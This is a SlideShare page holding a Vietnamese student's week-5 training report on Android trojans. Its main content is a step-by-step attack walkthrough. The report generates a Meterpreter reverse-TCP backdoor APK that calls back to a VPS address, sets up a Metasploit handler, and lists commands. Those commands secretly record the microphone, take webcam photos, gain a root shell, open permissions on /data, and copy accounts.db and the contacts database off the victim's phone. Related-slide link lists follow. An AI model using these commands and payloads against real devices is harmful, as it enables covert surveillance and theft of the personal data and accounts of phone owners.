SlideShare una empresa de Scribd logo
1 de 13
TRUNG TÂM ĐÀO TẠO QUẢN TRỊ MẠNG & AN NINH MẠNG 
QUỐC TẾ 
ĐỀ TÀI : 
NGHIÊN CỨU CÁC TROJAN, MALWARE CHO 
PHÉP ĐÁNH CẮP DỮ LIỆU NHƯ DANH SÁCH 
CONTACT, TIN NHẮN TRÊN ĐIỆN THOẠI SỬ 
DỤNG ANDROID VÀ GỬI RA NGOÀI 
BÁO CÁO TUẦN 5 
GVHD: VÕ ĐỖ THẮNG 
SVTH: TRẦN THANH THÔNG 
MSSV: 1120168
TẤN CÔNG MÁY ANDROID TỪ MÁY VPS 
1. Tạo ứng dụng chứa mã độc trên Kali Linux: 
Trước tiên, ta cần một ứng dụng backdoor để nạn nhân cài vào điện thoại 
Android 
Bước 1: Khởi động máy ảo Kali Linux. Mở Terminal . 
Bước 2: Thực hiện lệnh sau để tạo mã độc từ payload Meterpreter: 
“msfpayload android/meterpreter/reverse_tcp lhost =<IP máy VPS> 
lport=<Mã port muốn dùng> R > <đường dẫn lưu trữ> / <tên file>” 
Giả sử: msfpayload android/meterpreter/reverse_tcp lhost=14.0.21.162 
lport=4444 R> /root/Desktop/hack.apk 
2. Tấn công đi ện thoại Android: 
Bước 1: Tại máy VPS, mở Metasploit Console. Đợi phần mềm khởi động, có 
thể mất vài chục phút. 
Bước 2: Tiến hành thiết đặt payload bằng các lệnh 
 “ use exploit/multi/handler ” 
 “ set payload android/meterpreter/reverse_tcp ” 
 “ set lhost 14.0.21.162 ” 
 “ set lport 4444 ” 
 “ run ” 
Ta phải sử dụng đúng payload, lhost, lport mà ta đã dùng để tạo backdoor 
ở trên. 
Bước 3: Sau đó, Metasploit sẽ khởi động 1 handler để chờ đợi sự kết nối từ 
máy Android nạn nhân. Giả sử nạn nhân truy cập vào ứng dụng backdoor, ta sẽ 
nhận được thông báo như sau:
Bước 4: Dùng lệnh “help” để kiểm tra các lệnh ta có thể thao tác 
3. Các phương thức tấn công được sử dụng: 
Sau đây sẽ giới thiệu 1 số phương thức để tân công máy Android nạn nhân. 
3.1 Ghi âm lén: 
Sử dụng lệnh: “ record_mic <số giây ghi âm> ” 
3.2 Sử dụng camera: 
Xem danh sách webcam của thiết bị: “ webcam_list ” 
Chụp ảnh lén: “webcam_snap <mã camera>”
3.3 Tải và xóa file bất kỳ từ bộ nhớ sdcard: 
Di chuyển vào thư mục bằng lệnh: cd 
Tải về bằng lệnh: download <tên file> 
Xóa tập tin bằng lệnh: rm <tên file> 
3.4 Truy cập trực ti ếp vào hệ thống:
Truy cập vào hệ thống bằng lệnh: “shell ” > “su” 
Kiểm tra máy đã root hay chưa bằng lệnh: “whoami ” 
Nếu kết quả trả về là “whoami: unknown uid 0” là máy đã được root. Ta có 
thể tiếp tục tấn công. 
3.5 Truy cập và khai thác tài khoản người dùng: 
Thực hiện lệnh để vào xem file lưu tài khoản người dùng: “cd /data/system” > “ls – 
l” 
Copy file về thẻ nhớ sdcard bằng lệnh: “cp accounts.db /sdcard”
Trở về meterpreter và tải file accounts.db về:
Sử dụng tiện ích SQLite Manager trên Firefox để xem nội dung của accounts.db
3.6 Truy cập và đánh cắp danh bạ điện thoại: 
Thực hiện lệnh để vào xem file lưu trữ danh bạ điện thoại: 
“cd /data/data/com.android.providers.contacts/databases” 
Copy về thẻ sdcard và tải về máy
Xem nội dung của contacts2.db bằng SQLite Manager
3.7 Một số câu l ệnh khác: 
- Để biết thêm về các lệnh có thể thực hiện ta dùng help 
- Để xem thông tin về máy, nhập lệnh sysinfo 
- Để xem các tác vụ đang chạy gõ ps 
- Xem ip của máy bị hack ta gõ ipconfig 
- Xem danh sách thư mục, file gõ ls
- Để upload gõ lệnh upload 
- ls -l danh mục file và các quyền 
- Để ăn cắp tài khoản, mật khẩu, file apk và thay đổi các quyền 
/DATA 
/DATA/APP 
/DATA/SYSTEM 
/DATA/SYSTEM/accounts.db 
/DATA/SYSTEM/SYNC/accounts.xml 
/SYSTEM/APP/ 
- Để xem danh sách và down load các file hay thay đổi các file trong ROM 
Đầu tiên phải gõ lệnh SU để có toàn quyền truy cập 
Để có đường dẫn đầy đủ dùng lệnh chmod -R 777 path to filename 
Ví dụ chmod -R 777 /data 
- Ctrl + C để quay lại
Athena tuần 5

Más contenido relacionado

La actualidad más candente

Cách tạo mã độc trên kali linux và triển khai trên android ảo
Cách tạo mã độc trên kali linux và triển khai trên android ảoCách tạo mã độc trên kali linux và triển khai trên android ảo
Cách tạo mã độc trên kali linux và triển khai trên android ảo
thach28
 
Tạo mã độc trên vps
Tạo mã độc trên vpsTạo mã độc trên vps
Tạo mã độc trên vps
Hường Tô
 
Cài đặt kali linux trên máy ảo VMware
Cài đặt kali linux trên máy ảo VMwareCài đặt kali linux trên máy ảo VMware
Cài đặt kali linux trên máy ảo VMware
Nguyen Stone
 
Nghiên cứu các chương trình có mã độc trên android và nghiên cứu cài đặt bac...
Nghiên cứu các chương trình có mã độc trên android  và nghiên cứu cài đặt bac...Nghiên cứu các chương trình có mã độc trên android  và nghiên cứu cài đặt bac...
Nghiên cứu các chương trình có mã độc trên android và nghiên cứu cài đặt bac...
Nguyen Anh
 
Cấu hình modem alcatel speed touch để xem camera
Cấu hình modem alcatel speed touch để xem cameraCấu hình modem alcatel speed touch để xem camera
Cấu hình modem alcatel speed touch để xem camera
Thien Binh
 
bao cao tuan 34
bao cao tuan 34bao cao tuan 34
bao cao tuan 34
chanhduy
 
Part 37 exchange server - anti spam -www.key4_vip.info
Part 37   exchange server - anti spam -www.key4_vip.infoPart 37   exchange server - anti spam -www.key4_vip.info
Part 37 exchange server - anti spam -www.key4_vip.info
laonap166
 

La actualidad más candente (20)

Cách tạo mã độc trên kali linux và triển khai trên android ảo
Cách tạo mã độc trên kali linux và triển khai trên android ảoCách tạo mã độc trên kali linux và triển khai trên android ảo
Cách tạo mã độc trên kali linux và triển khai trên android ảo
 
Tạo mã độc trên vps để xâm nhập android - Nguyen Xuan Ngoc
Tạo mã độc trên vps để xâm nhập android - Nguyen Xuan NgocTạo mã độc trên vps để xâm nhập android - Nguyen Xuan Ngoc
Tạo mã độc trên vps để xâm nhập android - Nguyen Xuan Ngoc
 
Vũ thanh hiếu tạo mã độc trên vps tấn công android
Vũ thanh hiếu   tạo mã độc trên vps tấn công androidVũ thanh hiếu   tạo mã độc trên vps tấn công android
Vũ thanh hiếu tạo mã độc trên vps tấn công android
 
Bao cao tuan 2
Bao cao tuan 2Bao cao tuan 2
Bao cao tuan 2
 
Tạo mã độc trên vps
Tạo mã độc trên vpsTạo mã độc trên vps
Tạo mã độc trên vps
 
Bao cao tuan 2
Bao cao tuan 2Bao cao tuan 2
Bao cao tuan 2
 
tao ma doc tren kalilinux
tao ma doc tren kalilinuxtao ma doc tren kalilinux
tao ma doc tren kalilinux
 
Bao cao vps
Bao cao vpsBao cao vps
Bao cao vps
 
Tuan5
Tuan5Tuan5
Tuan5
 
Cài đặt kali linux trên máy ảo VMware
Cài đặt kali linux trên máy ảo VMwareCài đặt kali linux trên máy ảo VMware
Cài đặt kali linux trên máy ảo VMware
 
Nghiên cứu các chương trình có mã độc trên android và nghiên cứu cài đặt bac...
Nghiên cứu các chương trình có mã độc trên android  và nghiên cứu cài đặt bac...Nghiên cứu các chương trình có mã độc trên android  và nghiên cứu cài đặt bac...
Nghiên cứu các chương trình có mã độc trên android và nghiên cứu cài đặt bac...
 
Tuan2
Tuan2Tuan2
Tuan2
 
Cấu hình modem alcatel speed touch để xem camera
Cấu hình modem alcatel speed touch để xem cameraCấu hình modem alcatel speed touch để xem camera
Cấu hình modem alcatel speed touch để xem camera
 
Bao cao tuan 3
Bao cao tuan 3Bao cao tuan 3
Bao cao tuan 3
 
Metasploit
MetasploitMetasploit
Metasploit
 
bao cao tuan 34
bao cao tuan 34bao cao tuan 34
bao cao tuan 34
 
Cai dat kali tren vmware
Cai dat kali tren vmwareCai dat kali tren vmware
Cai dat kali tren vmware
 
Bt th lt phan tan
Bt th lt phan tanBt th lt phan tan
Bt th lt phan tan
 
Part 37 exchange server - anti spam -www.key4_vip.info
Part 37   exchange server - anti spam -www.key4_vip.infoPart 37   exchange server - anti spam -www.key4_vip.info
Part 37 exchange server - anti spam -www.key4_vip.info
 
Báo cáo tuần 5
Báo cáo tuần 5Báo cáo tuần 5
Báo cáo tuần 5
 

Destacado

Connect
ConnectConnect
Connect
155714
 
Why you should create Subscription Types in HubSpot
Why you should create Subscription Types in HubSpotWhy you should create Subscription Types in HubSpot
Why you should create Subscription Types in HubSpot
HubSpot Customer Education
 
To a sad daughter
To a sad daughterTo a sad daughter
To a sad daughter
navi berdin
 
ראש אחר - לילך וסרמן
ראש אחר - לילך וסרמןראש אחר - לילך וסרמן
ראש אחר - לילך וסרמן
hila_el
 
борьба сакских властей
борьба сакских властейборьба сакских властей
борьба сакских властей
Nadin Rakitina
 
ראש אחר מאמרה של לילך וסרמן
ראש אחר מאמרה של לילך וסרמןראש אחר מאמרה של לילך וסרמן
ראש אחר מאמרה של לילך וסרמן
hila_el
 
Webinar 630 lofts
Webinar   630 loftsWebinar   630 lofts
Webinar 630 lofts
douglasco
 
Báo cáo đề tài thực tập cuối kỳ
Báo cáo đề tài thực tập cuối kỳBáo cáo đề tài thực tập cuối kỳ
Báo cáo đề tài thực tập cuối kỳ
thanhthong1210
 

Destacado (19)

Accurate Drupal Admin Backend
Accurate Drupal Admin BackendAccurate Drupal Admin Backend
Accurate Drupal Admin Backend
 
Steve jobs
Steve jobsSteve jobs
Steve jobs
 
Connect
ConnectConnect
Connect
 
Why you should create Subscription Types in HubSpot
Why you should create Subscription Types in HubSpotWhy you should create Subscription Types in HubSpot
Why you should create Subscription Types in HubSpot
 
Valores
ValoresValores
Valores
 
To a sad daughter
To a sad daughterTo a sad daughter
To a sad daughter
 
Drupal backend and admin
Drupal backend and adminDrupal backend and admin
Drupal backend and admin
 
ראש אחר - לילך וסרמן
ראש אחר - לילך וסרמןראש אחר - לילך וסרמן
ראש אחר - לילך וסרמן
 
Athena tuần 4
Athena tuần 4Athena tuần 4
Athena tuần 4
 
Drupal node access system & AUL 7.x.-2.x
Drupal node access system & AUL 7.x.-2.xDrupal node access system & AUL 7.x.-2.x
Drupal node access system & AUL 7.x.-2.x
 
борьба сакских властей
борьба сакских властейборьба сакских властей
борьба сакских властей
 
Архитектура Drupal Commerce. Основы работы с Drupal Commerce
Архитектура Drupal Commerce. Основы работы с Drupal CommerceАрхитектура Drupal Commerce. Основы работы с Drupal Commerce
Архитектура Drupal Commerce. Основы работы с Drupal Commerce
 
ראש אחר מאמרה של לילך וסרמן
ראש אחר מאמרה של לילך וסרמןראש אחר מאמרה של לילך וסרמן
ראש אחר מאמרה של לילך וסרמן
 
ERPAL - ERP with Drupal
ERPAL - ERP with DrupalERPAL - ERP with Drupal
ERPAL - ERP with Drupal
 
Athena tuần 3
Athena tuần 3Athena tuần 3
Athena tuần 3
 
Canvas
CanvasCanvas
Canvas
 
Webinar 630 lofts
Webinar   630 loftsWebinar   630 lofts
Webinar 630 lofts
 
Báo cáo đề tài thực tập cuối kỳ
Báo cáo đề tài thực tập cuối kỳBáo cáo đề tài thực tập cuối kỳ
Báo cáo đề tài thực tập cuối kỳ
 
Sistemas numericos
Sistemas numericosSistemas numericos
Sistemas numericos
 

Similar a Athena tuần 5

Cài đặt Genmymotion
 Cài đặt Genmymotion Cài đặt Genmymotion
Cài đặt Genmymotion
Trọng An
 

Similar a Athena tuần 5 (20)

Kali Linux
Kali LinuxKali Linux
Kali Linux
 
BÁO CÁO THỰC TẬP - TUẦN 6
BÁO CÁO THỰC TẬP - TUẦN 6BÁO CÁO THỰC TẬP - TUẦN 6
BÁO CÁO THỰC TẬP - TUẦN 6
 
BÁO CÁO THỰC TẬP - TUẦN 3-4
BÁO CÁO THỰC TẬP - TUẦN 3-4BÁO CÁO THỰC TẬP - TUẦN 3-4
BÁO CÁO THỰC TẬP - TUẦN 3-4
 
ATHENA - Nguyen Xuan Ngoc - Giua Ky
ATHENA - Nguyen Xuan Ngoc - Giua KyATHENA - Nguyen Xuan Ngoc - Giua Ky
ATHENA - Nguyen Xuan Ngoc - Giua Ky
 
BÁO CÁO THỰC TẬP ATHENA - BÁO CÁO GIỮA KỲ
BÁO CÁO THỰC TẬP ATHENA - BÁO CÁO GIỮA KỲBÁO CÁO THỰC TẬP ATHENA - BÁO CÁO GIỮA KỲ
BÁO CÁO THỰC TẬP ATHENA - BÁO CÁO GIỮA KỲ
 
BÁO CÁO THỰC TẬP - TUẦN 5
BÁO CÁO THỰC TẬP - TUẦN 5BÁO CÁO THỰC TẬP - TUẦN 5
BÁO CÁO THỰC TẬP - TUẦN 5
 
Bao cao
Bao caoBao cao
Bao cao
 
Genmymotion
GenmymotionGenmymotion
Genmymotion
 
Cài đặt Genmymotion
 Cài đặt Genmymotion Cài đặt Genmymotion
Cài đặt Genmymotion
 
BÁO CÁO THỰC TẬP - GIỮA KỲ
BÁO CÁO THỰC TẬP - GIỮA KỲBÁO CÁO THỰC TẬP - GIỮA KỲ
BÁO CÁO THỰC TẬP - GIỮA KỲ
 
icalendar nguyen duc thang
icalendar nguyen duc thangicalendar nguyen duc thang
icalendar nguyen duc thang
 
ATHENA - Nguyen Xuan Ngoc - Tuan 3,4
ATHENA - Nguyen Xuan Ngoc - Tuan 3,4ATHENA - Nguyen Xuan Ngoc - Tuan 3,4
ATHENA - Nguyen Xuan Ngoc - Tuan 3,4
 
Kali Linux
Kali LinuxKali Linux
Kali Linux
 
1
11
1
 
Bao cao thuc tap tuan 2
Bao cao thuc tap tuan 2Bao cao thuc tap tuan 2
Bao cao thuc tap tuan 2
 
Tuan4
Tuan4Tuan4
Tuan4
 
Kali Linux
Kali LinuxKali Linux
Kali Linux
 
Report athena week 1
Report athena week 1Report athena week 1
Report athena week 1
 
Report athena week 1
Report athena week 1Report athena week 1
Report athena week 1
 
Slide báo cáo: System Hacking
Slide báo cáo: System HackingSlide báo cáo: System Hacking
Slide báo cáo: System Hacking
 

Athena tuần 5

  • 1. TRUNG TÂM ĐÀO TẠO QUẢN TRỊ MẠNG & AN NINH MẠNG QUỐC TẾ ĐỀ TÀI : NGHIÊN CỨU CÁC TROJAN, MALWARE CHO PHÉP ĐÁNH CẮP DỮ LIỆU NHƯ DANH SÁCH CONTACT, TIN NHẮN TRÊN ĐIỆN THOẠI SỬ DỤNG ANDROID VÀ GỬI RA NGOÀI BÁO CÁO TUẦN 5 GVHD: VÕ ĐỖ THẮNG SVTH: TRẦN THANH THÔNG MSSV: 1120168
  • 2. TẤN CÔNG MÁY ANDROID TỪ MÁY VPS 1. Tạo ứng dụng chứa mã độc trên Kali Linux: Trước tiên, ta cần một ứng dụng backdoor để nạn nhân cài vào điện thoại Android Bước 1: Khởi động máy ảo Kali Linux. Mở Terminal . Bước 2: Thực hiện lệnh sau để tạo mã độc từ payload Meterpreter: “msfpayload android/meterpreter/reverse_tcp lhost =<IP máy VPS> lport=<Mã port muốn dùng> R > <đường dẫn lưu trữ> / <tên file>” Giả sử: msfpayload android/meterpreter/reverse_tcp lhost=14.0.21.162 lport=4444 R> /root/Desktop/hack.apk 2. Tấn công đi ện thoại Android: Bước 1: Tại máy VPS, mở Metasploit Console. Đợi phần mềm khởi động, có thể mất vài chục phút. Bước 2: Tiến hành thiết đặt payload bằng các lệnh  “ use exploit/multi/handler ”  “ set payload android/meterpreter/reverse_tcp ”  “ set lhost 14.0.21.162 ”  “ set lport 4444 ”  “ run ” Ta phải sử dụng đúng payload, lhost, lport mà ta đã dùng để tạo backdoor ở trên. Bước 3: Sau đó, Metasploit sẽ khởi động 1 handler để chờ đợi sự kết nối từ máy Android nạn nhân. Giả sử nạn nhân truy cập vào ứng dụng backdoor, ta sẽ nhận được thông báo như sau:
  • 3. Bước 4: Dùng lệnh “help” để kiểm tra các lệnh ta có thể thao tác 3. Các phương thức tấn công được sử dụng: Sau đây sẽ giới thiệu 1 số phương thức để tân công máy Android nạn nhân. 3.1 Ghi âm lén: Sử dụng lệnh: “ record_mic <số giây ghi âm> ” 3.2 Sử dụng camera: Xem danh sách webcam của thiết bị: “ webcam_list ” Chụp ảnh lén: “webcam_snap <mã camera>”
  • 4. 3.3 Tải và xóa file bất kỳ từ bộ nhớ sdcard: Di chuyển vào thư mục bằng lệnh: cd Tải về bằng lệnh: download <tên file> Xóa tập tin bằng lệnh: rm <tên file> 3.4 Truy cập trực ti ếp vào hệ thống:
  • 5. Truy cập vào hệ thống bằng lệnh: “shell ” > “su” Kiểm tra máy đã root hay chưa bằng lệnh: “whoami ” Nếu kết quả trả về là “whoami: unknown uid 0” là máy đã được root. Ta có thể tiếp tục tấn công. 3.5 Truy cập và khai thác tài khoản người dùng: Thực hiện lệnh để vào xem file lưu tài khoản người dùng: “cd /data/system” > “ls – l” Copy file về thẻ nhớ sdcard bằng lệnh: “cp accounts.db /sdcard”
  • 6. Trở về meterpreter và tải file accounts.db về:
  • 7. Sử dụng tiện ích SQLite Manager trên Firefox để xem nội dung của accounts.db
  • 8. 3.6 Truy cập và đánh cắp danh bạ điện thoại: Thực hiện lệnh để vào xem file lưu trữ danh bạ điện thoại: “cd /data/data/com.android.providers.contacts/databases” Copy về thẻ sdcard và tải về máy
  • 9. Xem nội dung của contacts2.db bằng SQLite Manager
  • 10.
  • 11. 3.7 Một số câu l ệnh khác: - Để biết thêm về các lệnh có thể thực hiện ta dùng help - Để xem thông tin về máy, nhập lệnh sysinfo - Để xem các tác vụ đang chạy gõ ps - Xem ip của máy bị hack ta gõ ipconfig - Xem danh sách thư mục, file gõ ls
  • 12. - Để upload gõ lệnh upload - ls -l danh mục file và các quyền - Để ăn cắp tài khoản, mật khẩu, file apk và thay đổi các quyền /DATA /DATA/APP /DATA/SYSTEM /DATA/SYSTEM/accounts.db /DATA/SYSTEM/SYNC/accounts.xml /SYSTEM/APP/ - Để xem danh sách và down load các file hay thay đổi các file trong ROM Đầu tiên phải gõ lệnh SU để có toàn quyền truy cập Để có đường dẫn đầy đủ dùng lệnh chmod -R 777 path to filename Ví dụ chmod -R 777 /data - Ctrl + C để quay lại